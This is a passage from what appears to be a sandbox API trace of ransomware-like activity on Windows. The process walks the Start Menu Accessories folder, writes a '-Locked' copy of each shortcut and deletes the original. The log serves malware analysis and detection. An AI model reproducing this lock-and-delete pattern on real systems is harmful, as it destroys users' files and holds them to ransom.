lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15b8914e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x15b8914e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x15baf3a9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x448, dwReserved0=0x0, dwReserved1=0x0, cFileName="Steps Recorder.lnk", cAlternateFileName="")) returned 1 [0299.899] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37da94b9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37da94b9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37da94b9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sticky Notes.lnk", cAlternateFileName="")) returned 1 [0299.900] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xf639e71, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xf639e71, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Tools", cAlternateFileName="SYSTEM~1")) returned 1 [0299.900] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6ec61aae, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6ec61aae, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6ec61aae, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tablet PC", cAlternateFileName="TABLET~1")) returned 1 [0299.900] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x571e447b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x571e447b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x571e447b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x448, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Fax and Scan.lnk", cAlternateFileName="")) returned 1 [0299.900] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34319950, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x34319950, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x34319950, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x543, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player.lnk", cAlternateFileName="")) returned 1 [0299.901] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2203aecd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2203aecd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2203aecd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x482, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wordpad.lnk", cAlternateFileName="")) returned 1 [0299.901] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5835376d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5835376d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5835376d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x462, dwReserved0=0x0, dwReserved1=0x0, cFileName="XPS Viewer.lnk", cAlternateFileName="")) returned 1 [0299.901] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5835376d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5835376d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5835376d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x462, dwReserved0=0x0, dwReserved1=0x0, cFileName="XPS Viewer.lnk", cAlternateFileName="")) returned 0 [0299.901] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0299.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0299.902] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\desktop.ini-Locked", lpFilePart=0x0) returned 0x53 [0299.902] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0299.902] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\desktop.ini-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\desktop.ini-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.907] GetFileType (hFile=0x49c) returned 0x1 [0299.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0299.907] GetFileType (hFile=0x49c) returned 0x1 [0299.910] CloseHandle (hObject=0x49c) returned 1 [0299.910] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\desktop.ini", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\desktop.ini", lpFilePart=0x0) returned 0x4c [0299.910] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\desktop.ini")) returned 1 [0299.912] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Math Input Panel.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Math Input Panel.lnk-Locked", lpFilePart=0x0) returned 0x5c [0299.912] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0299.913] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Math Input Panel.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\math input panel.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.914] GetFileType (hFile=0x49c) returned 0x1 [0299.914] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0299.914] GetFileType (hFile=0x49c) returned 0x1 [0299.917] CloseHandle (hObject=0x49c) returned 1 [0299.917] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Math Input Panel.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Math Input Panel.lnk", lpFilePart=0x0) returned 0x55 [0299.917] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Math Input Panel.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\math input panel.lnk")) returned 1 [0299.924] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Paint.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Paint.lnk-Locked", lpFilePart=0x0) returned 0x51 [0299.924] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0299.924] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Paint.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\paint.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.926] GetFileType (hFile=0x49c) returned 0x1 [0299.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0299.927] GetFileType (hFile=0x49c) returned 0x1 [0299.929] CloseHandle (hObject=0x49c) returned 1 [0299.929] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Paint.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Paint.lnk", lpFilePart=0x0) returned 0x4a [0299.929] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Paint.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\paint.lnk")) returned 1 [0299.931] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Remote Desktop Connection.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Remote Desktop Connection.lnk-Locked", lpFilePart=0x0) returned 0x65 [0299.931] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0299.931] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Remote Desktop Connection.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\remote desktop connection.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.932] GetFileType (hFile=0x49c) returned 0x1 [0299.932] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0299.932] GetFileType (hFile=0x49c) returned 0x1 [0299.934] CloseHandle (hObject=0x49c) returned 1 [0299.935] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Remote Desktop Connection.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Remote Desktop Connection.lnk", lpFilePart=0x0) returned 0x5e [0299.935] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Remote Desktop Connection.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\remote desktop connection.lnk")) returned 1 [0299.936] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Snipping Tool.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Snipping Tool.lnk-Locked", lpFilePart=0x0) returned 0x59 [0299.936] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0299.936] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Snipping Tool.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\snipping tool.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.936] GetFileType (hFile=0x49c) returned 0x1 [0299.936] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0299.937] GetFileType (hFile=0x49c) returned 0x1 [0299.939] CloseHandle (hObject=0x49c) returned 1 [0299.939] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Snipping Tool.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Snipping Tool.lnk", lpFilePart=0x0) returned 0x52 [0299.939] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Snipping Tool.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\snipping tool.lnk")) returned 1 [0299.940] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Steps Recorder.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Steps Recorder.lnk-Locked", lpFilePart=0x0) returned 0x5a [0299.940] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0299.940] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Steps Recorder.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\steps recorder.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.943] GetFileType (hFile=0x49c) returned 0x1 [0299.943] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0299.943] GetFileType (hFile=0x49c) returned 0x1 [0299.946] CloseHandle (hObject=0x49c) returned 1 [0299.946] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Steps Recorder.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Steps Recorder.lnk", lpFilePart=0x0) returned 0x53 [0299.946] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Steps Recorder.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\steps recorder.lnk")) returned 1 [0299.948] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sticky Notes.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sticky Notes.lnk-Locked", lpFilePart=0x0) returned 0x58 [0299.948] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0299.948] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sticky Notes.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sticky notes.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.950] GetFileType (hFile=0x49c) returned 0x1 [0299.950] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0299.950] GetFileType (hFile=0x49c) returned 0x1 [0299.953] CloseHandle (hObject=0x49c) returned 1 [0299.954] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sticky Notes.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sticky Notes.lnk", lpFilePart=0x0) returned 0x51 [0299.954] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sticky Notes.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sticky notes.lnk")) returned 1 [0299.957] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Fax and Scan.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Fax and Scan.lnk-Locked", lpFilePart=0x0) returned 0x60 [0299.957] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0299.957] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Fax and Scan.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows fax and scan.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.958] GetFileType (hFile=0x49c) returned 0x1 [0299.958] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0299.958] GetFileType (hFile=0x49c) returned 0x1 [0299.959] CloseHandle (hObject=0x49c) returned 1 [0299.960] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Fax and Scan.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Fax and Scan.lnk", lpFilePart=0x0) returned 0x59 [0299.960] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Fax and Scan.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows fax and scan.lnk")) returned 1 [0299.961] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Media Player.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Media Player.lnk-Locked", lpFilePart=0x0) returned 0x60 [0299.961] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0299.961] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Media Player.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows media player.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.962] GetFileType (hFile=0x49c) returned 0x1 [0299.962] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0299.962] GetFileType (hFile=0x49c) returned 0x1 [0299.964] CloseHandle (hObject=0x49c) returned 1 [0299.964] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Media Player.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Media Player.lnk", lpFilePart=0x0) returned 0x59 [0299.964] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Media Player.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows media player.lnk")) returned 1 [0299.965] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Wordpad.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Wordpad.lnk-Locked", lpFilePart=0x0) returned 0x53 [0299.965] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0299.965] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Wordpad.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\wordpad.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.966] GetFileType (hFile=0x49c) returned 0x1 [0299.966] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0299.966] GetFileType (hFile=0x49c) returned 0x1 [0299.967] CloseHandle (hObject=0x49c) returned 1 [0299.968] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Wordpad.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Wordpad.lnk", lpFilePart=0x0) returned 0x4c [0299.968] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Wordpad.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\wordpad.lnk")) returned 1 [0299.968] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\XPS Viewer.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\XPS Viewer.lnk-Locked", lpFilePart=0x0) returned 0x56 [0299.968] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0299.969] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\XPS Viewer.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\xps viewer.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.969] GetFileType (hFile=0x49c) returned 0x1 [0299.969] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0299.969] GetFileType (hFile=0x49c) returned 0x1 [0299.970] CloseHandle (hObject=0x49c) returned 1 [0299.971] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\XPS Viewer.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\XPS Viewer.lnk", lpFilePart=0x0) returned 0x4f [0299.971] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\XPS Viewer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\xps viewer.lnk")) returned 1 [0299.971] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af11c) returned 1 [0299.971] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools", nBufferLength=0x105, lpBuffer=0x1aec24, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools", lpFilePart=0x0) returned 0x4d [0299.971] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", nBufferLength=0x105, lpBuffer=0x1aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpFilePart=0x0) returned 0x4e [0299.972] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\*", lpFindFileData=0x1aee44 | out: lpFindFileData=0x1aee44*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xf639e71, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xf639e71, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.972] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xf639e71, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xf639e71, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.972] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50379765, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x50379765, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x50379765, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Character Map.lnk", cAlternateFileName="")) returned 1 [0299.972] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf639e71, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9ee2becc, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9ee2becc, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x55, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0299.973] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, 